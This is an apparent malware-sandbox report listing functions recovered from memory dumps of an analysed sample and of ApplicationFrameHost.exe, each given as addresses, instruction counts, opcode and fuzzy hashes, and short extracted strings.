Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785c09839c6effa27a1d360bdfd678f5cca8fa58f5609e59af6a2bb8c4e50d85
Instruction ID: 5293853c5fc37cdf0c0a69dd5b7482bf8b3f821a3eb3bca23090865db41b2828
Opcode Fuzzy Hash: 785c09839c6effa27a1d360bdfd678f5cca8fa58f5609e59af6a2bb8c4e50d85
Instruction Fuzzy Hash: 17F0273220D686CFE726931CD8257E4B7D1EF42324F0943BAC018CB2D2C46DD185C381

Function 00007FFAAC4783AC Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d992c671fa22fd1c7bb31b671fccc50417ba916d43a88c08e8ee23e6173f6b75
Instruction ID: 8ca5ba0f76e605fcd4190c2f140b177fc25d9c81386391fb9fc1875981dd90a2
Opcode Fuzzy Hash: d992c671fa22fd1c7bb31b671fccc50417ba916d43a88c08e8ee23e6173f6b75
Instruction Fuzzy Hash: 4AF0B770E19A1D8FEB90EB2888497A9B7B2FB56205F5080E5900DE2256DE306D858F45

Function 00007FFAAC477E19 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8edfb0158e1c1a5c460f43defc2b3a8b4fa55d985b89b8c2c4b0fb7e7a3475aa
Instruction ID: e3761cd70c50c4cef7da2492d9633ef3a7a9f5c9e8c4e7ab4b7707cd1a9a6b99
Opcode Fuzzy Hash: 8edfb0158e1c1a5c460f43defc2b3a8b4fa55d985b89b8c2c4b0fb7e7a3475aa
Instruction Fuzzy Hash: F3F0E23490860ACBE705DB04CC68ABD77A2FB42301F50457AD41AC7292CE38AA05C7C8

Function 00007FFAAC470FD7 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0613dd315ce496ca6fa1221e06245030b56271fc9d61d3ca5a44f2ddb75f53b6
Instruction ID: 4a62c05eae72a4fd98a3ebc3918ca93433c038bb4712054026d89b4037b67449
Opcode Fuzzy Hash: 0613dd315ce496ca6fa1221e06245030b56271fc9d61d3ca5a44f2ddb75f53b6
Instruction Fuzzy Hash: BDF0303090931ACBEF14DF50C454AED73F4EB11314F104579C41DAB290DE785948DB84

Function 00007FFAAC46D885 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC46A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac46a000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb4401e2881bcea8cc01f8ee2e592bd6452c5e32404c533b25005ffee61edfc
Instruction ID: 46f7ac94a571cd58b785d24278bb4b34313f91ac6b27a98272ea6696b5244b2c
Opcode Fuzzy Hash: cfb4401e2881bcea8cc01f8ee2e592bd6452c5e32404c533b25005ffee61edfc
Instruction Fuzzy Hash: 65F05E31D0960ACFEB04DF44C4486FDB7F0EB59315F14803AC419E62D5DA38AA48CBA8

Function 00007FFAAC460F69 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1319e992305e8e3a4833c545e80e5396a6aec9201f7694551a20499a230b7f85
Instruction ID: f05d7667a1889c21750cddddc8a9cc0bc978bbebc1db879f7ea94f2d9a213603
Opcode Fuzzy Hash: 1319e992305e8e3a4833c545e80e5396a6aec9201f7694551a20499a230b7f85
Instruction Fuzzy Hash: 5FF0B730909509CBEB14EB14C958BADB7B1FB59305F2082A6D40AA3295DA74AE458F88

Function 00007FFAAC461710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7697d30d3ff66851e22e765c2d8baca311a2714aa173fdf003b095cf79fb639b
Instruction ID: 183bb7164ec2cd9e4bcb04abe0d9f792dd7deb6d4170223208d694b99870d6cb
Opcode Fuzzy Hash: 7697d30d3ff66851e22e765c2d8baca311a2714aa173fdf003b095cf79fb639b
Instruction Fuzzy Hash: 69E06520D0A406C7F6685318C08C774E1D19B4230CF78C675F01CC61E9EA28EC8AD245

Function 00007FFAAC46240C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbecdece0cb60339a72359e76d910c2f9fca0da5338e2d75345b2f989f7ff196
Instruction ID: bb6e640bee3189eebac869333891cd3855a2a2206f0541237b16f8cf85a48b0a
Opcode Fuzzy Hash: cbecdece0cb60339a72359e76d910c2f9fca0da5338e2d75345b2f989f7ff196
Instruction Fuzzy Hash: 12F0DA30909519DBFB28EB14C819BA8B6B1FB51305F1081F9D00ED72A5DF746A88CF68

Function 00007FFAAC482888 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80e42673a7c86b7c2b4bae39baed8cbd4bd52b01309cf43b813af3a11d29e4d
Instruction ID: 989f3552d216479371621cd966517b11181181fc80666beae74e5530078e8559
Opcode Fuzzy Hash: e80e42673a7c86b7c2b4bae39baed8cbd4bd52b01309cf43b813af3a11d29e4d
Instruction Fuzzy Hash: 0DE09250E1F227C3FE289F25455D17C14515B46328EA0857A916FC11C4EC0CEB8C23DB

Function 00007FFAAC463F81 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6315cc91b8e75b66df8c4be6358f6a678409d4bbef723bb2de543bc30615a5dc
Instruction ID: 501f7ab5543ccad2280157e7c1b83451053a744f91972fdc2ee144e5c8f7b007
Opcode Fuzzy Hash: 6315cc91b8e75b66df8c4be6358f6a678409d4bbef723bb2de543bc30615a5dc
Instruction Fuzzy Hash: 4DE02670D1A96D9FEBB4DF188C547AAF6B1EF5A706F1040E5800DD2295DA345A848F84

Function 00007FFAAC47CE5A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db2f7afe559dd41afbc2f05be3e50780756af6f3d79c672e94c8510cfc728ac
Instruction ID: 59e929faaa54f4e2376d639da1e4e7a46262dc69b59731bfd9106570ce1afe35
Opcode Fuzzy Hash: 0db2f7afe559dd41afbc2f05be3e50780756af6f3d79c672e94c8510cfc728ac
Instruction Fuzzy Hash: 92C0125291E935C3B118462C254C0B82741DB42A9A7504275E00EA20A58D18D80511DC

Function 00007FFAAC47FB52 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c21b99b8422f21e15c436e26f5efcaef2d0dec22c50f7995795c3a5449eedfb
Instruction ID: 4e27b98900da7cd448fc9b5a9a83cf907e14d2191617544306d8bf52e863c814
Opcode Fuzzy Hash: 1c21b99b8422f21e15c436e26f5efcaef2d0dec22c50f7995795c3a5449eedfb
Instruction Fuzzy Hash: 8EC08C20B1E66ACFF6625B74401567819849F4F3087204CFAD00ED3282CC3EEE4453E0

Function 00007FFAAC47D3FB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df3d5426a5cbd7c111e9eb6d1bf0f3efd5ab79cdc683058eb422a10010bb25b
Instruction ID: 1043cad299d4018dcc2bf07557051f20f2564a088470410e0edc90fdfd76cbc3
Opcode Fuzzy Hash: 4df3d5426a5cbd7c111e9eb6d1bf0f3efd5ab79cdc683058eb422a10010bb25b
Instruction Fuzzy Hash: 2BD09254A2EA73C7F5395B01812823915908F4A309E24843DC05F498C2CE1AF419669A

Function 00007FFAAC482858 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 971116cf11fdf146853d6742b328c83c646ef6602f377fc715d58893eb48af12
Instruction ID: feaf297999fba8cd19b08e3ec4067e2bcb65a972fb781278546d5840d65cd05d
Opcode Fuzzy Hash: 971116cf11fdf146853d6742b328c83c646ef6602f377fc715d58893eb48af12
Instruction Fuzzy Hash: 55C0EA00C5F51BC3FC242F61484917810406B16228EE082B3D42E80085EE0DA29C67CA

Function 00007FFAAC4839D8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc4e4d9706da43bdee6bce4fd77030715671d3e97c785919d8a09bbd5791ede
Instruction ID: 946544cfb2aee861412fee6ec2e7865e9f554c009bb4837e68e658591a324791
Opcode Fuzzy Hash: 2dc4e4d9706da43bdee6bce4fd77030715671d3e97c785919d8a09bbd5791ede
Instruction Fuzzy Hash: 63C04C3090E506CBF2756724C01563625919F86748F208879C07F46A91DD79FA469784

Function 00007FFAAC482B10 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0835188d7369a31fc3947a188d52b4d34ce37b1a090b62297a5e66126c04217a
Instruction ID: 591f1124b8a2a19fcb287cec863f6c652ce9639835ccc45d4c645da60538a67d
Opcode Fuzzy Hash: 0835188d7369a31fc3947a188d52b4d34ce37b1a090b62297a5e66126c04217a
Instruction Fuzzy Hash: 7EA00204C9781E42BC1832BA1D8B0A474509B9A118FC59260E81C911C6E88E56ED03D7

Function 00007FFAAC47C941 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e730ab2157b4d797773b2b4e7b4029a1790f1020a7bfd4f29e6fe6074300d5b
Instruction ID: 81f14d5e8dddd4d3987c1620f3ea10c9b61860853c8191eb8b2aa3ea00f6d6d4
Opcode Fuzzy Hash: 0e730ab2157b4d797773b2b4e7b4029a1790f1020a7bfd4f29e6fe6074300d5b
Instruction Fuzzy Hash: 64B01200F0E323C3F1A043B4144C03C04800B4720CB509930E20F551C3EC4CB81811D8

Function 00007FFAAC483548 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2af6407fff8c7119449be533cd474f58bdb53b203633cc4e593a32cc8988dcf
Instruction ID: 3b56d57d54dc8ea55d1b91315c1b870aec1fa7b1106b32a4a6f3b2f03c3d08b7
Opcode Fuzzy Hash: e2af6407fff8c7119449be533cd474f58bdb53b203633cc4e593a32cc8988dcf
Instruction Fuzzy Hash: D3A02200E0C82383F02B3238800C03CC0820F00F00B20023AE80E822F3CC0C2F8200CF

Non-executed Functions

Function 00007FFAAC481340 Relevance: 6.3, Strings: 4, Instructions: 1266COMMON

Download Yara Rule

Strings

)M_^, xrefs: 00007FFAAC481B01
,M_^, xrefs: 00007FFAAC481801
0M_, xrefs: 00007FFAAC481704
'M_^, xrefs: 00007FFAAC481D01

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: 'M_^$)M_^$,M_^$0M_
API String ID: 0-3870949313
Opcode ID: 2adf3f100074ea34e9c7a1ccf92ac40a99280c942308691d8120e16ac6fa3730
Instruction ID: 5bea9e20a57a206f4dd605f38cf4497717aaf5f5134e3d6f67479774c8cc2fc6
Opcode Fuzzy Hash: 2adf3f100074ea34e9c7a1ccf92ac40a99280c942308691d8120e16ac6fa3730
Instruction Fuzzy Hash: 9D82D85398E2968BE242777CF86A8F57FD0DF4322970C82B7D08DC92A3DC09658987D5

Function 00007FFAAC471030 Relevance: 7.7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

Strings

", xrefs: 00007FFAAC47185D
], xrefs: 00007FFAAC471067
", xrefs: 00007FFAAC471601
., xrefs: 00007FFAAC4715A1
-, xrefs: 00007FFAAC4715CF
(, xrefs: 00007FFAAC4716C0

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: "$"$($-$.$]
API String ID: 0-2188748507
Opcode ID: 0a9b3aeace5ffd44af0b51da7c9b19011827bd98ab8660fb5f7f1669ea0fcdbd
Instruction ID: 69967b8756b48d06592893da46b4481f991d2b328845c179e00798ce8aef7baf
Opcode Fuzzy Hash: 0a9b3aeace5ffd44af0b51da7c9b19011827bd98ab8660fb5f7f1669ea0fcdbd
Instruction Fuzzy Hash: F661F770D06229CFEB68CF54C8987E9B7B1AF55315F1080BAD44DA7291DB389A88CF84

Function 00007FFAAC47146C Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

', xrefs: 00007FFAAC47148D
), xrefs: 00007FFAAC4714C5
[, xrefs: 00007FFAAC471480
/, xrefs: 00007FFAAC4712FC

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: '$)$/$[
API String ID: 0-3599401559
Opcode ID: 256d169e337d2d501c6224cc5132f30150fb3b6ee7dca8ada0f60daa95622f63
Instruction ID: eb465ee3a3753569f84f93e8d31e58949b63c82d36763077b36b6a7cc8fa40eb
Opcode Fuzzy Hash: 256d169e337d2d501c6224cc5132f30150fb3b6ee7dca8ada0f60daa95622f63
Instruction Fuzzy Hash: C631D370D0A329CFEB64DF64C4587EDB6F5AB09315F2041B9D00DA6291DB389A88CF84

Function 00007FFAAC471537 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

", xrefs: 00007FFAAC47156E
", xrefs: 00007FFAAC471601
., xrefs: 00007FFAAC4715A1
-, xrefs: 00007FFAAC4715CF

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: "$"$-$.
API String ID: 0-3498691900
Opcode ID: ea96d099c61a5de8b59bc320b2b81d8b453217e88e4a5799cf1ac97361c4e2a1
Instruction ID: 16c84f3e112f663f8b3bb89eceef2e19d43ca5135cc4941a9958f6fd0b9be408
Opcode Fuzzy Hash: ea96d099c61a5de8b59bc320b2b81d8b453217e88e4a5799cf1ac97361c4e2a1
Instruction Fuzzy Hash: A721EA75D05229CFEB68DF54C8987FDB7B1AF15315F0044B9E04EA6281DB389A84DF44

Function 00007FFAAC471750 Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

', xrefs: 00007FFAAC47148D
), xrefs: 00007FFAAC4714C5
}, xrefs: 00007FFAAC471787
[, xrefs: 00007FFAAC471480

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: '$)$[$}
API String ID: 0-1467991846
Opcode ID: 4229bc4d549b0bebe11d02b1176edeb6c93e52774cb8b52613af8becf8d3ccb5
Instruction ID: 20c11a8b129eca1bdebff3b2f41f858027b54cb7d2255a9db2fc15091121e92e
Opcode Fuzzy Hash: 4229bc4d549b0bebe11d02b1176edeb6c93e52774cb8b52613af8becf8d3ccb5
Instruction Fuzzy Hash: 77210A70D05229CFEB64DF54C8987FDB7B1AF55315F1045B9D40DAB2A0DA389A88CF84

Analysis Process: ApplicationFrameHost.exePID: 9516, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC463595 Relevance: 7.8, Strings: 6, Instructions: 276COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC463714
r6, xrefs: 00007FFAAC4636F1
r6, xrefs: 00007FFAAC4636CE
r6, xrefs: 00007FFAAC4636AB
b4, xrefs: 00007FFAAC463770
"9, xrefs: 00007FFAAC463657

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6$r6$r6
API String ID: 0-3175317751
Opcode ID: d65225d8991f42afa8bb160265a4cdc0dd57b950b1e982004a673ecb121ab77f
Instruction ID: 1b52e63616fc2e763adfdf306c974ed7ad08b77c7c1b03a3b8eff1f71cd5f903
Opcode Fuzzy Hash: d65225d8991f42afa8bb160265a4cdc0dd57b950b1e982004a673ecb121ab77f
Instruction Fuzzy Hash: C091C4B1A1CA8D8FF794DB6CC8597ECBBE1FB5A314F504179C00EC32DADAA458058781

Function 00007FFAAC4616A8 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83acddf64f74e6a82c1079978019625f0eed8a7afc5b262e59a96afca46a2040
Instruction ID: f8d90e2a4f2689965682ed902fed8efa9d5e3fe8c7807cbb08fc6f3119000469
Opcode Fuzzy Hash: 83acddf64f74e6a82c1079978019625f0eed8a7afc5b262e59a96afca46a2040
Instruction Fuzzy Hash: 5781A031A1CA498FEB59DB18C8556B9B7E2EF99304B14457EE44EC328ACE34EC0687C5

Function 00007FFAAC461C8D Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe39f3349287363bef080b53788ef417245ac6da246585da3aa70f0dda9b5e8
Instruction ID: 538c6af2288c64395aee05089b5d6354c446c5086cf968a91589ee21e65d27c3
Opcode Fuzzy Hash: 3fe39f3349287363bef080b53788ef417245ac6da246585da3aa70f0dda9b5e8
Instruction Fuzzy Hash: 4A51C271A18B898FEB48CF18C8556BAB7E2FF99305B14457EE44EC7285CE34E81287C5

Function 00007FFAAC4620A5 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6078bb791dbe64ad0da7d149d2f418d5512b1d7745e849096832cde1a5979f3b
Instruction ID: 93bf26017053650d317f5e2108161a24e9f76a7d800df5a9098c16713147d1e7
Opcode Fuzzy Hash: 6078bb791dbe64ad0da7d149d2f418d5512b1d7745e849096832cde1a5979f3b
Instruction Fuzzy Hash: 3A419A71A0DA4A9FF365D738D8491F8FBE0EF86304B0485BBD04DC3196DE28A84583C1

Function 00007FFAAC463205 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b0227e024f6fd576f0bb9c093cf88bfa2333b40cf9110b3c07e606ac1bb03a5
Instruction ID: 4cf89f0b094bdd7f8a76f8cabcde986970f78a034230d2704303d201629f8cd6
Opcode Fuzzy Hash: 0b0227e024f6fd576f0bb9c093cf88bfa2333b40cf9110b3c07e606ac1bb03a5
Instruction Fuzzy Hash: 96514970D0968DCFEB54DBA8C4586EDB7F1EF4A304F408179D40EE7295DA38A948CB84

Function 00007FFAAC4633EF Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02e8edc44d3a5d538eedbd84d24198561232dfc00eca448eef94d814e78a333
Instruction ID: 1457cd3d9455bc1084e8625ad20707ca58d2cdf3c686ab048534dc4b47987fd4
Opcode Fuzzy Hash: b02e8edc44d3a5d538eedbd84d24198561232dfc00eca448eef94d814e78a333
Instruction Fuzzy Hash: B621B03084E7CA8FE7439B78885C5A9BFF0EF47304B0984EBD089CB1A3DA289449C751

Function 00007FFAAC463332 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed8cd88c58fc24f1e8ba3bd27032e2e289d297bdbe203abf2fc7fb119f03cc29
Instruction ID: 59d51700f63b331d7f99b55f86d415d079746c0340a2a2c13a063925fdbe13b4
Opcode Fuzzy Hash: ed8cd88c58fc24f1e8ba3bd27032e2e289d297bdbe203abf2fc7fb119f03cc29
Instruction Fuzzy Hash: B621147090869DCFEB54EB98C498AECB7F1FF59304F108029D40EE7299CA38A884CB54

Function 00007FFAAC46A521 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8684f1fdea1e4be9b9d3b59ab6eb9bf00a7cbae90b48d26714d809ade491c4
Instruction ID: 5566c15d942967f497a1352d7cdb3acfbd5e00d5595e07a525b9f7fe3db2ca54
Opcode Fuzzy Hash: 0a8684f1fdea1e4be9b9d3b59ab6eb9bf00a7cbae90b48d26714d809ade491c4
Instruction Fuzzy Hash: D3216F70914A4DCFDB85EF28C449AA97BF0FF19305F0145AAE80ED7255DB34E454CB81

Function 00007FFAAC460A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3faa2573f4ee403cbe0856f6a0d15158232b1add4c4860a6f47d2099aa560fda
Instruction ID: abe7b30093cbca65cf094980c8dc252c68e668a4f8383c1eb431c1aeb45b1db8
Opcode Fuzzy Hash: 3faa2573f4ee403cbe0856f6a0d15158232b1add4c4860a6f47d2099aa560fda
Instruction Fuzzy Hash: 8611907491964E8FF780EB68C44D5B9BBE0FF59354F4089B6D40DC60AAEE34E8488784

Function 00007FFAAC461F59 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a80aa92f485a93b61e4ea0959b51fc03869c88d2caa24d8b5b61742743d6b76
Instruction ID: 37d6e56e578d3b8d7152db21797c3e3a9c0f3e1164d101d9dd2f21e41353cc01
Opcode Fuzzy Hash: 3a80aa92f485a93b61e4ea0959b51fc03869c88d2caa24d8b5b61742743d6b76
Instruction Fuzzy Hash: 7C11515180F7C28FF76753799869662AFD44F03229B2D85FBD0DCCA0E7D9089849C346

Function 00007FFAAC46119D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000003C.00000002.1621121411.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ffaac460000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd96bd916fef20a70f7b349ac334d96488f5dec95fde2784c20f9de59775dd1
Instruction ID: f20e0095b69e02252029fdbd30e9ad754d31f530a7c6f6c9da735998263ff708
